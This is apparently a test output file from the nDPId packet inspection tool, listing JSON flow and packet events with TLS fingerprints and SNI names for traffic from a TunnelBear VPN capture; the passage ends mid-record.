+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1655734776464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776464,"pkt":"ABoRAAACABoRAAABCABFAAAoAGhAABAGhiZoEXIoCggAAQG7hCbNfES6MoO7RlAS\/\/9FrgAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1655734776465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776465,"pkt":"ABoRAAACABoRAAABCABFAAAoJvxAAEAGL5IKCAABaBFyKIQmAbsyg7tGzXxEu1AQ\/\/9FrwAA"} 
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776460,"flow_last_seen":1655734776467,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776467,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33830,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776512,"flow_last_seen":1655734776512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776512,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50904,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1655734776512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776512,"pkt":"ABoRAAACABoRAAABCABFAAA8+whAAEAGMq0KCAABaBGa7MbYAbtnT2bDAAAAAKAC\/\/8FIwAAAgQFtAQCCAoBZJ3LAAAAAAEDAwg="} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1655734776516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776516,"pkt":"ABoRAAACABoRAAABCABFAAAoAGpAABAGXWBoEZrsCggAAQG7xtiYsJk8Z09mxFAS\/\/\/aNwAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1655734776516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776516,"pkt":"ABoRAAACABoRAAABCABFAAAo+wlAAEAGMsAKCAABaBGa7MbYAbtnT2bEmLCZPVAQ\/\/\/aOAAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776516,"flow_last_seen":1655734776516,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776516,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33838,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1655734776516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776516,"pkt":"ABoRAAACABoRAAABCABFAAA8p\/tAAEAGrn4KCAABaBFyKIQuAbtZOTo3AAAAAKAC\/\/+rMgAAAgQFtAQCCAoBZJ3MAAAAAAEDAwg="} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1655734776519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776519,"pkt":"ABoRAAACABoRAAABCABFAAAoAGtAABAGhiNoEXIoCggAAQG7hC6mxsXIWTk6OFAS\/\/9FpgAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1655734776519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776519,"pkt":"ABoRAAACABoRAAABCABFAAAop\/xAAEAGrpEKCAABaBFyKIQuAbtZOTo4psbFyVAQ\/\/9FpwAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776516,"flow_last_seen":1655734776520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776520,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33838,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776520,"flow_last_seen":1655734776520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776520,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1655734776520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776520,"pkt":"ABoRAAACABoRAAABCABFAAA8vpVAAEAGl+QKCAABaBFyKIQyAbvrdiNYAAAAAKAC\/\/8vzwAAAgQFtAQCCAoBZJ3NAAAAAAEDAwg="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1655734776527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776527,"pkt":"ABoRAAACABoRAAABCABFAAAoAG1AABAGhiFoEXIoCggAAQG7hDIUidyn63YjWVAS\/\/9FogAA"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776527,"flow_last_seen":1655734776527,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776527,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1655734776527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776527,"pkt":"ABoRAAACABoRAAABCABFAAA8wepAAEAGlI8KCAABaBFyKIQ2AbtYcFwkAAAAAKAC\/\/+KBAAAAgQFtAQCCAoBZJ3OAAAAAAEDAwg="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1655734776537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776537,"pkt":"ABoRAAACABoRAAABCABFAAAoAG5AABAGhiBoEXIoCggAAQG7hDanj6PbWHBcJVAS\/\/9FngAA"} 
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776512,"flow_last_seen":1655734776537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776537,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50904,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.tunnelbear.com","ja3":"a1c672bda2bda1a05bdca801144b2760","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776538,"flow_last_seen":1655734776538,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776538,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33848,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1655734776538,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776538,"pkt":"ABoRAAACABoRAAABCABFAAA8tphAAEAGn+EKCAABaBFyKIQ4AbtFRStWAAAAAKAC\/\/\/N+wAAAgQFtAQCCAoBZJ3OAAAAAAEDAwg="} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1655734776539,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776539,"pkt":"ABoRAAACABoRAAABCABFAAAoAHBAABAGhh5oEXIoCggAAQG7hDi6utSpRUUrV1AS\/\/9FnAAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1655734776539,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776539,"pkt":"ABoRAAACABoRAAABCABFAAAovpZAAEAGl\/cKCAABaBFyKIQyAbvrdiNZFIncqFAQ\/\/9FowAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776520,"flow_last_seen":1655734776539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776539,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1655734776539,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776539,"pkt":"ABoRAAACABoRAAABCABFAAAowetAAEAGlKIKCAABaBFyKIQ2AbtYcFwlp4+j3FAQ\/\/9FnwAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776527,"flow_last_seen":1655734776539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776539,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1655734776541,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776541,"pkt":"ABoRAAACABoRAAABCABFAAAotplAAEAGn\/QKCAABaBFyKIQ4AbtFRStXurrUqlAQ\/\/9FnQAA"} 
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776538,"flow_last_seen":1655734776541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776541,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33848,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":287,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776460,"flow_last_seen":1655734776705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734776705,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33830,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776705,"flow_last_seen":1655734776705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776705,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":48222,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1655734776705,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776705,"pkt":"ABoRAAACABoRAAABCABFAAA8nhVAAEAG++kKCAABovfzvLxeAbvXLAPvAAAAAKAC\/\/9urgAAAgQFtAQCCAoBZJ36AAAAAAEDAwg="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1655734776707,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776707,"pkt":"ABoRAAACABoRAAABCABFAAAoAHVAABAGyZ6i9\/O8CggAAQG7vF4o0\/wQ1ywD8FAS\/\/9Q+wAA"} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1655734776707,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776707,"pkt":"ABoRAAACABoRAAABCABFAAAonhZAAEAG+\/wKCAABovfzvLxeAbvXLAPwKNP8EVAQ\/\/9Q\/AAA"} +00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776705,"flow_last_seen":1655734776708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776708,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":48222,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile-collector.newrelic.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":307,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776527,"flow_last_seen":1655734776870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734776870,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":308,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776520,"flow_last_seen":1655734776870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734776870,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776516,"flow_last_seen":1655734776871,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734776871,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33838,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":312,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776538,"flow_last_seen":1655734776872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734776872,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33848,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01193{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":313,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776512,"flow_last_seen":1655734776874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5473,"flow_tot_l4_payload_len":5990,"flow_avg_l4_payload_len":998,"midstream":0,"thread_ts_msec":1655734776874,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50904,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api.tunnelbear.com","server_names":"*.tunnelbear.com,tunnelbear.com","ja3":"a1c672bda2bda1a05bdca801144b2760","ja3s":"a885fb01204bc11cc58efc02fe640899","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tunnelbear.com","alpn":"h2,http\/1.1","fingerprint":"52:96:E2:83:CC:15:4E:B3:0F:5B:1D:E2:E8:FF:4E:A9:C4:E9:C0:AF"}} +01185{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":370,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776705,"flow_last_seen":1655734776969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3864,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1655734776969,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":48222,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile-collector.newrelic.com","server_names":"*.newrelic.com,newrelic.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"a885fb01204bc11cc58efc02fe640899","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=New Relic, Inc., 